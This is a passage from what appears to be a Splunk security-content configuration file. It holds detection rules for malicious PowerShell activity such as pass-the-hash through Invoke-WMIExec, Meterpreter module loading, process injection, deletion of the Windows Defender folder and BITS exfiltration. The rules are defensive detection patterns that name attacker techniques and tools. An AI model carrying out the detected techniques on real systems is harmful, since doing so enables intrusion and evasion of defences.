following analytic detects the usage of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). The utility is used for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the usage of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). The utility is used for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives should be limited as this analytic is designed to detect a specific utility. It is recommended to apply appropriate filters as needed to minimize the number of false positives. action.escu.creation_date = 2023-03-22 action.escu.modification_date = 2023-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Invoke WmiExec Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Suspicious WMI Use"] action.risk = 1 action.risk.param._risk_message = PowerShell was identified running a Invoke-WmiExec on $Computer$. action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Invoke WmiExec Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the usage of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). The utility is used for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. action.notable.param.rule_title = PowerShell Invoke WmiExec Usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*invoke-wmiexec*") | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_invoke_wmiexec_usage_filter` [ESCU - Powershell Load Module in Meterpreter - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies "MSF.Powershell","MSF.Powershell.Meterpreter","MSF.Powershell.Meterpreter.Kiwi","MSF.Powershell.Meterpreter.Transport" being used. This behavior is related to when a Meterpreter session is started and the operator runs load_kiwi. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies "MSF.Powershell","MSF.Powershell.Meterpreter","MSF.Powershell.Meterpreter.Kiwi","MSF.Powershell.Meterpreter.Transport" being used. This behavior is related to when a Meterpreter session is started and the operator runs load_kiwi. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = The following analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = False positives should be very limited as this is strict to MetaSploit behavior. action.escu.creation_date = 2022-11-22 action.escu.modification_date = 2022-11-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Load Module in Meterpreter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["MetaSploit"] action.risk = 1 action.risk.param._risk_message = PowerShell was identified running a script utilized by Meterpreter from MetaSploit on endpoint $Computer$ by user $user_id$. action.risk.param._risk = [{"risk_object_field": "user_id", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Load Module in Meterpreter - Rule action.correlationsearch.annotations = {"analytic_story": ["MetaSploit"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies "MSF.Powershell","MSF.Powershell.Meterpreter","MSF.Powershell.Meterpreter.Kiwi","MSF.Powershell.Meterpreter.Transport" being used. This behavior is related to when a Meterpreter session is started and the operator runs load_kiwi. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Powershell Load Module in Meterpreter action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*MSF.Powershell*","*MSF.Powershell.Meterpreter*","*MSF.Powershell.Meterpreter.Kiwi*","*MSF.Powershell.Meterpreter.Transport*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_load_module_in_meterpreter_filter` [ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives should be limited as day to day scripts do not use this method. action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Winter Vivern", "AgentTesla", "AsyncRAT", "Hermetic Wiper", "Malicious PowerShell", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains reflective class assembly command in $ScriptBlockText$ to load .net code in memory with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "AgentTesla", "AsyncRAT", "Hermetic Wiper", "Malicious PowerShell", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = PowerShell Loading DotNET into Memory via Reflection action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*[system.reflection.assembly]::load(*","*[reflection.assembly]*", "*reflection.assembly*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_loading_dotnet_into_memory_via_reflection_filter` [ESCU - Powershell Processing Stream Of Data - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is processing compressed stream data. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are stream flattened and will be deflated durnig execution. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is processing compressed stream data. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are stream flattened and will be deflated durnig execution. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = powershell may used this function to process compressed data. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Processing Stream Of Data - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "AsyncRAT", "Hermetic Wiper", "Data Destruction", "IcedID"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains stream command in $ScriptBlockText$ commonly for processing compressed or to decompressed binary file with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 40}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Processing Stream Of Data - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "AsyncRAT", "Hermetic Wiper", "Data Destruction", "IcedID"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is processing compressed stream data. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are stream flattened and will be deflated durnig execution. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.notable.param.rule_title = Powershell Processing Stream Of Data action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*IO.Compression.*" OR ScriptBlockText = "*IO.StreamReader*" OR ScriptBlockText = "*]::Decompress*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_processing_stream_of_data_filter` [ESCU - Powershell Remote Services Add TrustedHost - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains command to add or modify the trustedhost configuration in Windows OS. This behavior raises concerns due to the nature of modifications made to the 'TrustedHost' configuration, which typically involves adjusting settings crucial for remote connections and security protocols. Alterations in this area could potentially indicate attempts to manipulate trusted hosts or systems for unauthorized remote access, a tactic commonly observed in various unauthorized access or compromise attempts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.006", "T1021"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains command to add or modify the trustedhost configuration in Windows OS. This behavior raises concerns due to the nature of modifications made to the 'TrustedHost' configuration, which typically involves adjusting settings crucial for remote connections and security protocols. Alterations in this area could potentially indicate attempts to manipulate trusted hosts or systems for unauthorized remote access, a tactic commonly observed in various unauthorized access or compromise attempts. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = user and network administrator may used this function to add trusted host. action.escu.creation_date = 2023-11-23 action.escu.modification_date = 2023-11-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Remote Services Add TrustedHost - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = a powershell script adding a remote trustedhost on $dest$ . action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Remote Services Add TrustedHost - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.006", "T1021"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains command to add or modify the trustedhost configuration in Windows OS. This behavior raises concerns due to the nature of modifications made to the 'TrustedHost' configuration, which typically involves adjusting settings crucial for remote connections and security protocols. Alterations in this area could potentially indicate attempts to manipulate trusted hosts or systems for unauthorized remote access, a tactic commonly observed in various unauthorized access or compromise attempts. action.notable.param.rule_title = Powershell Remote Services Add TrustedHost action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*WSMan:\\localhost\\Client\\TrustedHosts*" ScriptBlockText IN ("* -Value *", "* -Concatenate *") | rename Computer as dest, UserID as user | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remote_services_add_trustedhost_filter` [ESCU - Powershell Remote Thread To Known Windows Process - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is designed to detect suspicious powershell process that tries to inject code and to known/critical windows process and execute it using CreateRemoteThread. This technique is seen in several malware like trickbot and offensive tooling like cobaltstrike where it load a shellcode to svchost.exe to execute reverse shell to c2 and download another payload action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = this search is designed to detect suspicious powershell process that tries to inject code and to known/critical windows process and execute it using CreateRemoteThread. This technique is seen in several malware like trickbot and offensive tooling like cobaltstrike where it load a shellcode to svchost.exe to execute reverse shell to c2 and download another payload action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, Create Remote thread from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances of create remote thread may be used. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-08-25 action.escu.modification_date = 2022-08-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Remote Thread To Known Windows Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Trickbot"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell process $process_name$ that tries to create a remote thread on target process $TargetImage$ with eventcode $EventCode$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Remote Thread To Known Windows Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is designed to detect suspicious powershell process that tries to inject code and to known/critical windows process and execute it using CreateRemoteThread. This technique is seen in several malware like trickbot and offensive tooling like cobaltstrike where it load a shellcode to svchost.exe to execute reverse shell to c2 and download another payload action.notable.param.rule_title = Powershell Remote Thread To Known Windows Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode = 8 parent_process_name IN ("powershell_ise.exe", "powershell.exe") TargetImage IN ("*\\svchost.exe","*\\csrss.exe" "*\\gpupdate.exe", "*\\explorer.exe","*\\services.exe","*\\winlogon.exe","*\\smss.exe","*\\wininit.exe","*\\userinit.exe","*\\spoolsv.exe","*\\taskhost.exe") | stats min(_time) as firstTime max(_time) as lastTime count by SourceImage process_name SourceProcessId SourceProcessGuid TargetImage TargetProcessId NewThreadId StartAddress dest EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remote_thread_to_known_windows_process_filter` [ESCU - Powershell Remove Windows Defender Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will identify a suspicious PowerShell command used to delete the Windows Defender folder. This technique was seen used by the WhisperGate malware campaign where it used Nirsofts advancedrun.exe to gain administrative privileges to then execute a PowerShell command to delete the Windows Defender folder. This is a good indicator the offending process is trying corrupt a Windows Defender installation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic will identify a suspicious PowerShell command used to delete the Windows Defender folder. This technique was seen used by the WhisperGate malware campaign where it used Nirsofts advancedrun.exe to gain administrative privileges to then execute a PowerShell command to delete the Windows Defender folder. This is a good indicator the offending process is trying corrupt a Windows Defender installation. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Remove Windows Defender Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Data Destruction", "WhisperGate"] action.risk = 1 action.risk.param._risk_message = suspicious powershell script $ScriptBlockText$ was executed on the $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Remove Windows Defender Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "WhisperGate"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will identify a suspicious PowerShell command used to delete the Windows Defender folder. This technique was seen used by the WhisperGate malware campaign where it used Nirsofts advancedrun.exe to gain administrative privileges to then execute a PowerShell command to delete the Windows Defender folder. This is a good indicator the offending process is trying corrupt a Windows Defender installation. action.notable.param.rule_title = Powershell Remove Windows Defender Directory action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*rmdir *" AND ScriptBlockText = "*\\Microsoft\\Windows Defender*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_remove_windows_defender_directory_filter` [ESCU - PowerShell Script Block With URL Chain - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are attempting to download 2nd stage payloads. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059.001", "T1105"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are attempting to download 2nd stage payloads. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.how_to_implement = The following analytic requires PowerShell operational logs to be imported. Modify the powershell macro as needed to match the sourcetype or add index. This analytic is specific to 4104, or PowerShell Script Block Logging. action.escu.known_false_positives = Unknown, possible custom scripting. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Script Block With URL Chain - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script used by $user$ on host $dest$ contains $url_count$ URLs in an array, this is commonly used for malware. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}, {"threat_object_field": "url", "threat_object_type": "url"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Script Block With URL Chain - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059.001", "T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. This is typically found in obfuscated PowerShell or PowerShell executing embedded .NET or binary files that are attempting to download 2nd stage payloads. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.notable.param.rule_title = PowerShell Script Block With URL Chain action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*http:*","*https:*") | regex ScriptBlockText="(\"?(https?:\/\/(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&\/=]*))\"?(?:,|\))?){2,}" | rex max_match=20 field=ScriptBlockText "(?https?:\/\/(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&\/=]*))" | eval Path = case(isnotnull(Path),Path,true(),"unknown") | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(Path) as file_name values(UserID) as user values(url) as url dc(url) as url_count by ActivityID, Computer, EventCode | rename Computer as dest, EventCode as signature_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_script_block_with_url_chain_filter` [ESCU - PowerShell Start-BitsTransfer - Rule] action.escu = 0 action.escu.enabled = 1 description = Start-BitsTransfer is the PowerShell "version" of BitsAdmin.exe. Similar functionality is present. This technique variation is not as commonly used by adversaries, but has been abused in the past. Lesser known uses include the ability to set the `-TransferType` to `Upload` for exfiltration of files. In an instance where `Upload` is used, it is highly possible files will be archived. During triage, review parallel processes and process lineage. Capture any files on disk and review. For the remote domain or IP, what is the reputation? action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1197"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Start-BitsTransfer is the PowerShell "version" of BitsAdmin.exe. Similar functionality is present. This technique variation is not as commonly used by adversaries, but has been abused in the past. Lesser known uses include the ability to set the `-TransferType` to `Upload` for exfiltration of files. In an instance where `Upload` is used, it is highly possible files will be archived. During triage, review parallel processes and process lineage. Capture any files on disk and review. For the remote domain or IP, what is the reputation? action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives. It is possible administrators will utilize Start-BitsTransfer for administrative tasks, otherwise filter based parent process or command-line arguments. action.escu.creation_date = 2021-03-29 action.escu.modification_date = 2021-03-29 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Start-BitsTransfer - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", 